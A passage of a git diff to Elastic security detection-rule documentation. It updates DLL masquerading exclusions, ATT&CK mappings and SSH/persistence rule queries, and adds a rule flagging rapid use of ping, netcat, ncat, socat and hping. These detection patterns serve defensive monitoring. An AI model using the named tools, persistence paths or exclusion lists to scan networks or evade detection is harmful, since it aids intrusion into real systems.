"vbscript.dll", "vbssysprep.dll", "vcardparser.dll", "vdsbas.dll", "vdsdyn.dll", "vdsutil.dll", "vdsvd.dll", "vds_ps.dll", "verifier.dll", "version.dll", "vertdll.dll", "vfuprov.dll", "vfwwdm32.dll", "vhfum.dll", "vid.dll", "videohandlers.dll", "vidreszr.dll", "virtdisk.dll", "vmbuspipe.dll", "vmdevicehost.dll", "vmictimeprovider.dll", "vmrdvcore.dll", "voiprt.dll", "vpnike.dll", "vpnikeapi.dll", "vpnsohdesktop.dll", "vpnv2csp.dll", "vscmgrps.dll", "vssapi.dll", "vsstrace.dll", "vss_ps.dll", "w32time.dll", "w32topl.dll", "waasassessment.dll", "waasmediccapsule.dll", "waasmedicps.dll", "waasmedicsvc.dll", "wabsyncprovider.dll", "walletproxy.dll", "walletservice.dll", "wavemsp.dll", "wbemcomn.dll", "wbiosrvc.dll", "wci.dll", "wcimage.dll", "wcmapi.dll", "wcmcsp.dll", "wcmsvc.dll", "wcnapi.dll", "wcncsvc.dll", "wcneapauthproxy.dll", "wcneappeerproxy.dll", "wcnnetsh.dll", "wcnwiz.dll", "wc_storage.dll", "wdc.dll", "wdi.dll", "wdigest.dll", "wdscore.dll", "webauthn.dll", "webcamui.dll", "webcheck.dll", "webclnt.dll", "webio.dll", "webservices.dll", "websocket.dll", "wecapi.dll", "wecsvc.dll", "wephostsvc.dll", "wer.dll", "werconcpl.dll", "wercplsupport.dll", "werenc.dll", "weretw.dll", "wersvc.dll", "werui.dll", "wevtapi.dll", "wevtfwd.dll", "wevtsvc.dll", "wfapigp.dll", "wfdprov.dll", "wfdsconmgr.dll", "wfdsconmgrsvc.dll", "wfhc.dll", "whealogr.dll", "whhelper.dll", "wiaaut.dll", "wiadefui.dll", "wiadss.dll", "wiarpc.dll", "wiascanprofiles.dll", "wiaservc.dll", "wiashext.dll", "wiatrace.dll", "wificloudstore.dll", "wificonfigsp.dll", "wifidisplay.dll", "wimgapi.dll", "win32spl.dll", "win32u.dll", "winbio.dll", "winbiodatamodel.dll", "winbioext.dll", "winbrand.dll", "wincorlib.dll", "wincredprovider.dll", "wincredui.dll", "windowmanagement.dll", "windowscodecs.dll", "windowscodecsext.dll", "windowscodecsraw.dll", "windowsiotcsp.dll", "windowslivelogin.dll", "winethc.dll", "winhttp.dll", "winhttpcom.dll", "winhvemulation.dll", "winhvplatform.dll", "wininet.dll", "wininetlui.dll", "wininitext.dll", "winipcfile.dll", "winipcsecproc.dll", "winipsec.dll", "winlangdb.dll", "winlogonext.dll", "winmde.dll", "winml.dll", "winmm.dll", "winmmbase.dll", "winmsipc.dll", "winnlsres.dll", "winnsi.dll", "winreagent.dll", "winrnr.dll", "winrscmd.dll", "winrsmgr.dll", "winrssrv.dll", "winrttracing.dll", "winsatapi.dll", "winscard.dll", "winsetupui.dll", "winshfhc.dll", "winsku.dll", "winsockhc.dll", "winsqlite3.dll", "winsrpc.dll", "winsrv.dll", "winsrvext.dll", "winsta.dll", "winsync.dll", "winsyncmetastore.dll", "winsyncproviders.dll", "wintrust.dll", "wintypes.dll", "winusb.dll", "wirednetworkcsp.dll", "wisp.dll", "wkscli.dll", "wkspbrokerax.dll", "wksprtps.dll", "wkssvc.dll", "wlanapi.dll", "wlancfg.dll", "wlanconn.dll", "wlandlg.dll", "wlangpui.dll", "wlanhc.dll", "wlanhlp.dll", "wlanmediamanager.dll", "wlanmm.dll", "wlanmsm.dll", "wlanpref.dll", "wlanradiomanager.dll", "wlansec.dll", "wlansvc.dll", "wlansvcpal.dll", "wlanui.dll", "wlanutil.dll", "wldap32.dll", "wldp.dll", "wlgpclnt.dll", "wlidcli.dll", "wlidcredprov.dll", "wlidfdp.dll", "wlidnsp.dll", "wlidprov.dll", "wlidres.dll", "wlidsvc.dll", "wmadmod.dll", "wmadmoe.dll", "wmalfxgfxdsp.dll", "wmasf.dll", "wmcodecdspps.dll", "wmdmlog.dll", "wmdmps.dll", "wmdrmsdk.dll", "wmerror.dll", "wmi.dll", "wmiclnt.dll", "wmicmiplugin.dll", "wmidcom.dll", "wmidx.dll", "wmiprop.dll", "wmitomi.dll", "wmnetmgr.dll", "wmp.dll", "wmpdui.dll", "wmpdxm.dll", "wmpeffects.dll", "wmphoto.dll", "wmploc.dll", "wmpps.dll", "wmpshell.dll", "wmsgapi.dll", "wmspdmod.dll", "wmspdmoe.dll", "wmvcore.dll", "wmvdecod.dll", "wmvdspa.dll", "wmvencod.dll", "wmvsdecd.dll", "wmvsencd.dll", "wmvxencd.dll", "woftasks.dll", "wofutil.dll", "wordbreakers.dll", "workfoldersgpext.dll", "workfoldersres.dll", "workfoldersshell.dll", "workfolderssvc.dll", "wosc.dll", "wow64.dll", "wow64cpu.dll", "wow64win.dll", "wpbcreds.dll", "wpc.dll", "wpcapi.dll", "wpcdesktopmonsvc.dll", "wpcproxystubs.dll", "wpcrefreshtask.dll", "wpcwebfilter.dll", "wpdbusenum.dll", "wpdshext.dll", "wpdshserviceobj.dll", "wpdsp.dll", "wpd_ci.dll", "wpnapps.dll", "wpnclient.dll", "wpncore.dll", "wpninprc.dll", "wpnprv.dll", "wpnservice.dll", "wpnsruprov.dll", "wpnuserservice.dll", "wpportinglibrary.dll", "wpprecorderum.dll", "wptaskscheduler.dll", "wpx.dll", "ws2help.dll", "ws2_32.dll", "wscapi.dll", "wscinterop.dll", "wscisvif.dll", "wsclient.dll", "wscproxystub.dll", "wscsvc.dll", "wsdapi.dll", "wsdchngr.dll", "wsdprintproxy.dll", "wsdproviderutil.dll", "wsdscanproxy.dll", "wsecedit.dll", "wsepno.dll", "wshbth.dll", "wshcon.dll", "wshelper.dll", "wshext.dll", "wshhyperv.dll", "wship6.dll", "wshqos.dll", "wshrm.dll", "wshtcpip.dll", "wshunix.dll", "wslapi.dll", "wsmagent.dll", "wsmauto.dll", "wsmplpxy.dll", "wsmres.dll", "wsmsvc.dll", "wsmwmipl.dll", "wsnmp32.dll", "wsock32.dll", "wsplib.dll", "wsp_fs.dll", "wsp_health.dll", "wsp_sr.dll", "wtsapi32.dll", "wuapi.dll", "wuaueng.dll", "wuceffects.dll", "wudfcoinstaller.dll", "wudfplatform.dll", "wudfsmcclassext.dll", "wudfx.dll", "wudfx02000.dll", "wudriver.dll", "wups.dll", "wups2.dll", "wuuhext.dll", "wuuhosdeployment.dll", "wvc.dll", "wwaapi.dll", "wwaext.dll", "wwanapi.dll", "wwancfg.dll", "wwanhc.dll", "wwanprotdim.dll", "wwanradiomanager.dll", "wwansvc.dll", "wwapi.dll", "xamltilerender.dll", "xaudio2_8.dll", "xaudio2_9.dll", "xblauthmanager.dll", "xblgamesave.dll", "xblgamesaveext.dll", "xblgamesaveproxy.dll", "xboxgipsvc.dll", "xboxgipsynthetic.dll", "xboxnetapisvc.dll", "xinput1_4.dll", "xinput9_1_0.dll", "xinputuap.dll", "xmlfilter.dll", "xmllite.dll", "xmlprovi.dll", "xolehlp.dll", "xpsgdiconverter.dll", "xpsprint.dll", "xpspushlayer.dll", "xpsrasterservice.dll", "xpsservices.dll", "xwizards.dll", "xwreg.dll", "xwtpdui.dll", "xwtpw32.dll", "zipcontainer.dll", "zipfldr.dll", "bootsvc.dll", "halextintcpsedma.dll", "icsvcvss.dll", "ieproxydesktop.dll", "lsaadt.dll", "nlansp_c.dll", "nrtapi.dll", "opencl.dll", "pfclient.dll", "pnpdiag.dll", "prxyqry.dll", "rdpnanotransport.dll", "servicingcommon.dll", "sortwindows63.dll", "sstpcfg.dll", "tdhres.dll", "umpodev.dll", "utcapi.dll", "windlp.dll", "wow64base.dll", "wow64con.dll", "blbuires.dll", "bpainst.dll", "cbclient.dll", "certadm.dll", "certocm.dll", "certpick.dll", "csdeployres.dll", "dsdeployres.dll", "eapa3hst.dll", "eapacfg.dll", "eapahost.dll", "elsext.dll", "encdump.dll", "escmigplugin.dll", "fsclient.dll", "fsdeployres.dll", "fssminst.dll", "fssmres.dll", "fssprov.dll", "ipamapi.dll", "kpssvc.dll", "lbfoadminlib.dll", "mintdh.dll", "mmci.dll", "mmcico.dll", "mprsnap.dll", "mstsmhst.dll", "mstsmmc.dll", "muxinst.dll", "personax.dll", "rassfm.dll", "rasuser.dll", "rdmsinst.dll", "rdmsres.dll", "rtrfiltr.dll", "sacsvr.dll", "scrdenrl.dll", "sdclient.dll", "sharedstartmodel.dll", "smsrouter.dll", "spwizimg_svr.dll", "sqlcecompact40.dll", "sqlceoledb40.dll", "sqlceqp40.dll", "sqlcese40.dll", "srvmgrinst.dll", "svrmgrnc.dll", "tapisnap.dll", "tlsbrand.dll", "tsec.dll", "tsprop.dll", "tspubiconhelper.dll", "tssdjet.dll", "tsuserex.dll", "ualapi.dll", "ualsvc.dll", "umcres.dll", "updatehandlers.dll", "usocore.dll", "vssui.dll", "wsbappres.dll", "wsbonline.dll", "wsmselpl.dll", "wsmselrr.dll", "xpsfilt.dll", "xpsshhdr.dll" ) and not ( - (dll.name : "icuuc.dll" and dll.code_signature.subject_name == "Valve" and dll.code_signature.trusted == true) or - (dll.name : "dbghelp.dll" and dll.code_signature.trusted == true) or + ( + dll.name : "icuuc.dll" and dll.code_signature.subject_name in ( + "Valve", "Valve Corp.", "Avanquest Software (7270356 Canada Inc)", "Adobe Inc." + ) and dll.code_signature.trusted == true + ) or + ( + dll.name : ("timeSync.dll", "appInfo.dll") and dll.code_signature.subject_name in ( + "VMware Inc.", "VMware, Inc." + ) and dll.code_signature.trusted == true + ) or + ( + dll.name : "libcrypto.dll" and dll.code_signature.subject_name in ( + "NoMachine S.a.r.l.", "Bitdefender SRL", "Oculus VR, LLC" + ) and dll.code_signature.trusted == true + ) or + ( + dll.name : "ucrtbase.dll" and dll.code_signature.subject_name in ( + "Proofpoint, Inc.", "Rapid7 LLC", "Eclipse.org Foundation, Inc.", "Amazon.com Services LLC", "Windows Phone" + ) and dll.code_signature.trusted == true + ) or + (dll.name : "ICMP.dll" and dll.code_signature.subject_name == "Paessler AG" and dll.code_signature.trusted == true) or + (dll.name : "kerberos.dll" and dll.code_signature.subject_name == "Bitdefender SRL" and dll.code_signature.trusted == true) or + (dll.name : "dbghelp.dll" and dll.code_signature.trusted == true) or (dll.name : "DirectML.dll" and dll.code_signature.subject_name == "Adobe Inc." and dll.code_signature.trusted == true) or ( dll.path : ( @@ -95,3 +119,31 @@ library where event.action == "load" and ** Name: Masquerading ** ID: T1036 ** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Invalid Code Signature +** ID: T1036.001 +** Reference URL: https://attack.mitre.org/techniques/T1036/001/ +* Sub-technique: +** Name: Match Legitimate Name or Location +** ID: T1036.005 +** Reference URL: https://attack.mitre.org/techniques/T1036/005/ +* Technique: +** Name: Hijack Execution Flow +** ID: T1574 +** Reference URL: https://attack.mitre.org/techniques/T1574/ +* Sub-technique: +** Name: DLL Search Order Hijacking +** ID: T1574.001 +** Reference URL: https://attack.mitre.org/techniques/T1574/001/ +* Sub-technique: +** Name: DLL Side-Loading +** ID: T1574.002 +** Reference URL: https://attack.mitre.org/techniques/T1574/002/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Compromise Client Software Binary +** ID: T1554 +** Reference URL: https://attack.mitre.org/techniques/T1554/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-masquerading-as-system32-executable.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-masquerading-as-system32-executable.asciidoc index 7f64559b45..e3d6658c06 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-masquerading-as-system32-executable.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-masquerading-as-system32-executable.asciidoc @@ -28,9 +28,10 @@ Identifies suspicious instances of default system32 executables, either unsigned * OS: Windows * Use Case: Threat Detection * Tactic: Defense Evasion +* Tactic: Persistence * Rule Type: BBR -*Version*: 1 +*Version*: 2 *Rule authors*: @@ -83,3 +84,19 @@ process where event.type == "start" and process.code_signature.status : "*" and ** Name: Masquerading ** ID: T1036 ** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Invalid Code Signature +** ID: T1036.001 +** Reference URL: https://attack.mitre.org/techniques/T1036/001/ +* Sub-technique: +** Name: Match Legitimate Name or Location +** ID: T1036.005 +** Reference URL: https://attack.mitre.org/techniques/T1036/005/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Compromise Client Software Binary +** ID: T1554 +** Reference URL: https://attack.mitre.org/techniques/T1554/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-masquerading-as-vlc-dll.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-masquerading-as-vlc-dll.asciidoc index e0c51d2a26..9043e553ec 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-masquerading-as-vlc-dll.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-masquerading-as-vlc-dll.asciidoc @@ -28,9 +28,10 @@ Identifies instances of VLC-related DLLs which are not signed by the original de * OS: Windows * Use Case: Threat Detection * Tactic: Defense Evasion +* Tactic: Persistence * Rule Type: BBR -*Version*: 1 +*Version*: 2 *Rule authors*: @@ -63,3 +64,19 @@ library where host.os.type == "windows" and event.action == "load" and ** Name: Masquerading ** ID: T1036 ** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Invalid Code Signature +** ID: T1036.001 +** Reference URL: https://attack.mitre.org/techniques/T1036/001/ +* Sub-technique: +** Name: Match Legitimate Name or Location +** ID: T1036.005 +** Reference URL: https://attack.mitre.org/techniques/T1036/005/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Compromise Client Software Binary +** ID: T1554 +** Reference URL: https://attack.mitre.org/techniques/T1554/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-meterpreter-reverse-shell.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-meterpreter-reverse-shell.asciidoc index 23d3115954..1209c36c25 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-meterpreter-reverse-shell.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-meterpreter-reverse-shell.asciidoc @@ -29,7 +29,7 @@ This detection rule identifies a sample of suspicious Linux system file reads us * Use Case: Threat Detection * Tactic: Execution -*Version*: 1 +*Version*: 2 *Rule authors*: @@ -38,35 +38,6 @@ This detection rule identifies a sample of suspicious Linux system file reads us *Rule license*: Elastic License v2 -==== Investigation guide - - -[source, markdown] ----------------------------------- -## Setup -This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. - -``` -Kibana --> -Management --> -Integrations --> -Auditd Manager --> -Add Auditd Manager -``` - -`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the "audit rules" configuration box or the "auditd rule files" box by specifying a file to read the audit rules from. - -For this detection rule to trigger, the following additional audit rules are required to be added to the integration: - -``` --w /proc/net/ -p r -k audit_proc --w /etc/machine-id -p wa -k machineid --w /etc/passwd -p wa -k passwd -``` - -Add the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable. ----------------------------------- - ==== Rule query diff --git a/docs/detections/prebuilt-rules/rule-details/potential-network-scan-detected.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-network-scan-detected.asciidoc index a50a8507b5..db0d08cccf 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-network-scan-detected.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-network-scan-detected.asciidoc @@ -21,7 +21,7 @@ This rule identifies a potential port scan. A port scan is a method utilized by *Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) -*Maximum alerts per execution*: 100 +*Maximum alerts per execution*: 5 *References*: None @@ -32,7 +32,7 @@ This rule identifies a potential port scan. A port scan is a method utilized by * Tactic: Reconnaissance * Use Case: Network Security Monitoring -*Version*: 3 +*Version*: 4 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/potential-network-scan-executed-from-host.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-network-scan-executed-from-host.asciidoc new file mode 100644 index 0000000000..eccb5c9b09 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/potential-network-scan-executed-from-host.asciidoc @@ -0,0 +1,60 @@ +[[potential-network-scan-executed-from-host]] +=== Potential Network Scan Executed From Host + +This threshold rule monitors for the rapid execution of unix utilities that are capable of conducting network scans. Adversaries may leverage built-in tools such as ping, netcat or socat to execute ping sweeps across the network while attempting to evade detection or due to the lack of network mapping tools available on the compromised host. + +*Rule type*: threshold + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Discovery +* Data Source: Elastic Defend + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +host.os.type:linux and event.action:exec and event.type:start and +process.name:(ping or nping or hping or hping2 or hping3 or nc or ncat or netcat or socat) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Discovery +** ID: TA0007 +** Reference URL: https://attack.mitre.org/tactics/TA0007/ +* Technique: +** Name: Network Service Discovery +** ID: T1046 +** Reference URL: https://attack.mitre.org/techniques/T1046/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-network-share-discovery.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-network-share-discovery.asciidoc index f40806d727..9e32f1ee60 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-network-share-discovery.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-network-share-discovery.asciidoc @@ -29,9 +29,10 @@ Adversaries may look for folders and drives shared on remote systems to identify * OS: Windows * Use Case: Threat Detection * Tactic: Discovery +* Tactic: Collection * Rule Type: BBR -*Version*: 1 +*Version*: 2 *Rule authors*: @@ -65,3 +66,11 @@ sequence by user.name, source.port, source.ip with maxspan=15s ** Name: Network Share Discovery ** ID: T1135 ** Reference URL: https://attack.mitre.org/techniques/T1135/ +* Tactic: +** Name: Collection +** ID: TA0009 +** Reference URL: https://attack.mitre.org/tactics/TA0009/ +* Technique: +** Name: Data from Network Shared Drive +** ID: T1039 +** Reference URL: https://attack.mitre.org/techniques/T1039/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-network-sweep-detected.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-network-sweep-detected.asciidoc index ef3af53347..1e4be4e957 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-network-sweep-detected.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-network-sweep-detected.asciidoc @@ -21,7 +21,7 @@ This rule identifies a potential network sweep. A network sweep is a method use *Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) -*Maximum alerts per execution*: 100 +*Maximum alerts per execution*: 5 *References*: None @@ -32,7 +32,7 @@ This rule identifies a potential network sweep. A network sweep is a method use * Tactic: Reconnaissance * Use Case: Network Security Monitoring -*Version*: 3 +*Version*: 4 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/potential-non-standard-port-ssh-connection.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-non-standard-port-ssh-connection.asciidoc index 100c6eea24..f3c4e345f7 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-non-standard-port-ssh-connection.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-non-standard-port-ssh-connection.asciidoc @@ -32,7 +32,7 @@ Identifies potentially malicious processes communicating via a port paring typic * OS: macOS * Data Source: Elastic Defend -*Version*: 4 +*Version*: 5 *Rule authors*: @@ -47,13 +47,14 @@ Identifies potentially malicious processes communicating via a port paring typic [source, js] ---------------------------------- sequence by process.entity_id with maxspan=1m -[process where event.action == "exec" and process.name:"ssh"] -[network where process.name:"ssh" - and event.action in ("connection_attempted", "connection_accepted") - and destination.port != 22 - and destination.ip != "127.0.0.1" - and network.transport: "tcp" -] + [process where event.action == "exec" and process.name:"ssh" and not process.parent.name in ( + "rsync", "pyznap", "git", "ansible-playbook", "scp", "pgbackrest", "git-lfs", "expect", "Sourcetree", "ssh-copy-id", + "run" + ) + ] + [network where process.name:"ssh" and event.action in ("connection_attempted", "connection_accepted") and + destination.port != 22 and destination.ip != "127.0.0.1" and network.transport: "tcp" + ] ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/potential-openssh-backdoor-logging-activity.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-openssh-backdoor-logging-activity.asciidoc index e978e8d829..f9d54cb388 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-openssh-backdoor-logging-activity.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-openssh-backdoor-logging-activity.asciidoc @@ -36,7 +36,7 @@ Identifies a Secure Shell (SSH) client or server process creating or writing to * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -45,47 +45,6 @@ Identifies a Secure Shell (SSH) client or server process creating or writing to *Rule license*: Elastic License v2 -==== Investigation guide - - -[source, markdown] ----------------------------------- -### Elastic Defend Integration Setup -Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows -the Elastic Agent to monitor events on your host and send data to the Elastic Security app. - -#### Prerequisite Requirements: -- Fleet is required for Elastic Defend. -- To configure Fleet Server refer to the {security-guide}/fleet/current/fleet-server.html[documentation]. - -#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System: -- Go to the Kibana home page and click Add integrations. -- In the query bar, search for Elastic Defend and select the integration to see more details about it. -- Click Add Elastic Defend. -- Configure the integration name and optionally add a description. -- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads. -- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. {security-guide}/security/current/configure-endpoint-integration-policy.html[Helper guide]. -- We suggest to select "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" -- Enter a name for the agent policy in New agent policy name. If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead. -For more details on Elastic Agent configuration settings, refer to the {security-guide}/fleet/8.10/agent-policy.html[helper guide]. -- Click Save and Continue. -- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts. -For more details on Elastic Defend refer to the {security-guide}/security/current/install-endpoint.html[helper guide]. - -### Auditbeat Setup -Auditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations. - -#### The following steps should be executed in order to add the Auditbeat for Linux System: -- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages. -- To install the APT and YUM repositories follow the setup instructions in this {security-guide}/beats/auditbeat/current/setup-repositories.html[helper guide]. -- To run Auditbeat on Docker follow the setup instructions in the {security-guide}/beats/auditbeat/current/running-on-docker.html[helper guide]. -- To run Auditbeat on Kubernetes follow the setup instructions in the {security-guide}/beats/auditbeat/current/running-on-kubernetes.html[helper guide]. -- For complete Setup and Run Auditbeat information refer to the {security-guide}/beats/auditbeat/current/setting-up-and-running.html[helper guide]. - -#### Custom Ingest Pipeline -For versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the {security-guide}/fleet/current/data-streams-pipeline-tutorial.html[guide]. ----------------------------------- - ==== Rule query @@ -93,7 +52,8 @@ For versions <8.2, you need to add a custom ingest pipeline to populate `event.i ---------------------------------- file where host.os.type == "linux" and event.type == "change" and process.executable : ("/usr/sbin/sshd", "/usr/bin/ssh") and ( - (file.name : (".*", "~*", "*~") and not file.name : (".cache", ".viminfo", ".bash_history")) or + (file.name : (".*", "~*", "*~") and not file.name : (".cache", ".viminfo", ".bash_history", ".google_authenticator", + ".jelenv", ".csvignore", ".rtreport")) or file.extension : ("in", "out", "ini", "h", "gz", "so", "sock", "sync", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9") or file.path : ( diff --git a/docs/detections/prebuilt-rules/rule-details/potential-persistence-through-init-d-detected.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-persistence-through-init-d-detected.asciidoc index 3aa6e2cec6..f0ef21969a 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-persistence-through-init-d-detected.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-persistence-through-init-d-detected.asciidoc @@ -36,7 +36,7 @@ Files that are placed in the /etc/init.d/ directory in Unix can be used to start * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 5 +*Version*: 6 *Rule authors*: @@ -112,6 +112,7 @@ This rule looks for the creation of new files within the `/etc/init.d/` director - Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. - Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + ---------------------------------- ==== Rule query diff --git a/docs/detections/prebuilt-rules/rule-details/potential-persistence-through-motd-file-creation-detected.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-persistence-through-motd-file-creation-detected.asciidoc index 2211e84101..2a32dc7b3a 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-persistence-through-motd-file-creation-detected.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-persistence-through-motd-file-creation-detected.asciidoc @@ -34,7 +34,7 @@ Message of the day (MOTD) is the message that is presented to the user when a us * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 5 +*Version*: 6 *Rule authors*: @@ -106,6 +106,7 @@ This rule identifies the creation of new files within the `/etc/update-motd.d/` - Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. - Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + ---------------------------------- ==== Rule query @@ -114,9 +115,9 @@ This rule identifies the creation of new files within the `/etc/update-motd.d/` [source, js] ---------------------------------- host.os.type :"linux" and event.action:("creation" or "file_create_event" or "rename" or "file_rename_event") and -file.path : (/etc/update-motd.d/* or /usr/lib/update-notifier/*) and not -process.executable : ("/usr/bin/dpkg" or "/usr/bin/dockerd" or "/bin/rpm" or "/kaniko/executor") and not -file.extension : ("swp" or "swx") +file.path : (/etc/update-motd.d/* or /usr/lib/update-notifier/*) and not process.name : ( + dpkg or dockerd or rpm or executor or dnf +) and not file.extension : ("swp" or "swpx") ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/potential-persistence-through-run-control-detected.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-persistence-through-run-control-detected.asciidoc index d6d6d0a5f6..5e74c51b27 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-persistence-through-run-control-detected.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-persistence-through-run-control-detected.asciidoc @@ -36,7 +36,7 @@ This rule monitors the creation/alteration of the rc.local file by a previously * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -109,6 +109,7 @@ Detection alerts from this rule indicate the creation of a new `/etc/rc.local` f - Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. - Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + ---------------------------------- ==== Rule query @@ -118,7 +119,9 @@ Detection alerts from this rule indicate the creation of a new `/etc/rc.local` f ---------------------------------- host.os.type : "linux" and event.category : "file" and event.type : ("change" or "file_modify_event" or "creation" or "file_create_event") and -file.path : "/etc/rc.local" and not process.name : ("dockerd" or "docker" or "dnf" or "yum" or "rpm" or "dpkg") and not file.extension : ("swp" or "swx") +file.path : "/etc/rc.local" and not process.name : ( + "dockerd" or "docker" or "dnf" or "dnf-automatic" or "yum" or "rpm" or "dpkg" +) and not file.extension : ("swp" or "swpx") ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/potential-persistence-via-time-provider-modification.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-persistence-via-time-provider-modification.asciidoc index 1fc7ba072e..dcbf3d4c07 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-persistence-via-time-provider-modification.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-persistence-via-time-provider-modification.asciidoc @@ -30,10 +30,11 @@ Identifies modification of the Time Provider. Adversaries may establish persiste * OS: Windows * Use Case: Threat Detection * Tactic: Persistence +* Tactic: Privilege Escalation * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 104 +*Version*: 105 *Rule authors*: @@ -70,3 +71,15 @@ registry where host.os.type == "windows" and event.type:"change" and ** Name: Time Providers ** ID: T1547.003 ** Reference URL: https://attack.mitre.org/techniques/T1547/003/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Boot or Logon Autostart Execution +** ID: T1547 +** 